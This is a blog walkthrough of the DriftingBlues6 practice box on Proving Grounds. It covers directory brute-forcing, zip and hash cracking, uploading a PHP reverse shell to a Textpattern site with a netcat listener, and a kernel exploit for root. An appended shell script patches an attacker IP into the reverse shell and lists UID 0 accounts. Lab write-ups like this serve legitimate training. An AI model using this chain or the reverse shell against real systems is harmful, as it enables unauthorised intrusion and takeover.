Hey,
here’s a fast learner’s guide to conquering DriftingBlues6 on Proving Grounds.
Proving Grounds is a fun place to hang out and hack boxes for credit and experience.

This particular box falls under “Warm up” (Newbie level), but it covers some good exercises you can use to build up your skills.
Anyhow:
1. Scan the box and find the open ports: tcp/22 (SSH) and tcp/80 (HTTP). Without any credentials SSH is rarely the way in and is usually a distractor, so let’s focus on tcp/80.
2. Dig up hidden files and directories with gobuster or dirb, your choice; both do about the same thing. BTW, you’re advised up front to pay attention to ZIP files, so add .zip as an extension to the scan:
gobuster dir -u http://target.box -x zip --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
– PS: I usually add an entry for the target IP to /etc/hosts so I can refer to the box by name (target.box in the URLs below) instead of by IP address.
3. This, along with http://target.box/robots.txt, reveals a useful directory structure.
4. This process revealed a hidden zip file called spammer.zip. It required a password to unzip, but it was easily crackable with fcrackzip, which brute-forces password attempts against zip files, which is awesome. I’d bet there’s such a cracker for password-protected PDF files.
5. Unzipping the archive after cracking reveals a password hash. Save it to a file (hash) and break it with john: $ john hash --wordlist=/usr/share/wordlists/rockyou.txt
6. After cracking the hash you have a username and password for the Textpattern login we found via robots.txt at http://target.box/textpattern/textpattern
7. Log in, go to Content / Files and upload a PHP reverse shell (https://www.revshells.com/ will generate one). Edit it with your own IP address and the port your netcat listener will use so it can phone home.
8. Start the listener: nc -nvlp 4444
9. Request the file at http://target.box/textpattern/files/php-reverse-shell.php and the listener catches a basic shell.
10. Now run uname -a to find the kernel version, look up a matching C exploit on exploit-db.com (searchsploit on Kali queries the same database offline), download it, and compile it with the syntax given in the comments at the top of the source. Check first whether the target has gcc; if it doesn’t, compile on your own machine for the same architecture and transfer the binary over.
11. chmod +x the compiled exploit, then run it.
12. It compromises the box and gives you the chance to set a username with UID 0; su to that account to become root (confirm with id), then cat /root/flag.txt for the win!
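Here is an added helper script for the fiddly bits of the steps above; it is not from the original post. It wraps three things: parsing nmap’s grepable (-oG) output for open ports (step 1), patching your IP and port into a pentestmonkey-style php-reverse-shell.php such as the one revshells.com generates (step 7), and listing every UID 0 account in /etc/passwd once the kernel exploit has done its work (step 12). The attacker IP 192.168.45.10, the listener port 4444, the nmap line and the /etc/passwd lines are constructed sample data; the sed patterns assume the `$ip = '...';` and `$port = ...;` lines of the PentestMonkey template.

```shell
#!/bin/sh
# Added helper for the DriftingBlues6 walkthrough; not part of the original
# post. All sample data is constructed; 192.168.45.10 and port 4444 are
# assumptions for the attacker side.
set -eu

# Step 1: print open ports from an nmap grepable (-oG) file as "port/proto".
# Only entries whose state field is "open" are kept (closed/filtered dropped).
open_ports() {   # usage: open_ports scan.gnmap
  grep '^Host:.*Ports:' "$1" \
    | sed 's/.*Ports: //; s/[[:space:]]*Ignored State.*//' \
    | tr ',' '\n' \
    | sed 's/^[[:space:]]*//' \
    | awk -F/ '$2 == "open" { print $1 "/" $3 }'
}

# Step 7: set our IP and port in a pentestmonkey-style php-reverse-shell.php.
# Assumes the template lines:  $ip = '127.0.0.1';  // CHANGE THIS
#                              $port = 1234;       // CHANGE THIS
# Written without sed -i so it behaves the same on GNU and BSD sed.
patch_revshell() {   # usage: patch_revshell php-reverse-shell.php LHOST LPORT
  sed -e "s/^[\$]ip = '[^']*';/\$ip = '$2';/" \
      -e "s/^[\$]port = [0-9]*;/\$port = $3;/" "$1" > "$1.tmp" \
    && mv "$1.tmp" "$1"
}

# Step 12: any account whose UID (third colon-separated field) is 0 is root,
# including one the exploit added. Test the field with awk rather than
# grepping for "0" in the line, which matches far too much.
uid0_users() {   # usage: uid0_users /etc/passwd
  awk -F: '$3 == 0 { print $1 }' "$1"
}

# Demo on constructed input; no network or target needed.
demo() {
  d=$(mktemp -d)

  printf 'Host: 192.168.45.20 ()\tPorts: 22/open/tcp//ssh///, 80/open/tcp//http//Apache httpd 2.4.38 ((Debian))/\tIgnored State: closed (998)\n' > "$d/scan.gnmap"
  echo "open ports:"; open_ports "$d/scan.gnmap"

  printf '%s\n' "\$ip = '127.0.0.1';  // CHANGE THIS" \
                "\$port = 1234;       // CHANGE THIS" > "$d/php-reverse-shell.php"
  patch_revshell "$d/php-reverse-shell.php" 192.168.45.10 4444
  echo "patched shell:"; cat "$d/php-reverse-shell.php"

  printf '%s\n' 'root:x:0:0:root:/root:/bin/bash' \
                'daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin' \
                'newroot:x:0:0::/root:/bin/bash' > "$d/passwd"
  echo "UID 0 accounts:"; uid0_users "$d/passwd"

  rm -rf "$d"
}
demo
```

Against a real box you would feed open_ports the file from `nmap -oG scan.gnmap target.box`, run patch_revshell on the downloaded shell before uploading it in step 7, and run uid0_users on the target’s /etc/passwd after step 12 to see which name to su to.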

That was a fun box and a little challenging, because dumb little things stopped me from proceeding, like using -A with grep to find strings in /etc/passwd. It didn’t make sense, but it worked.

Try it,
Greg

By Greg Miller

Ex-military cyber officer. Triathlete and mountain bike racer.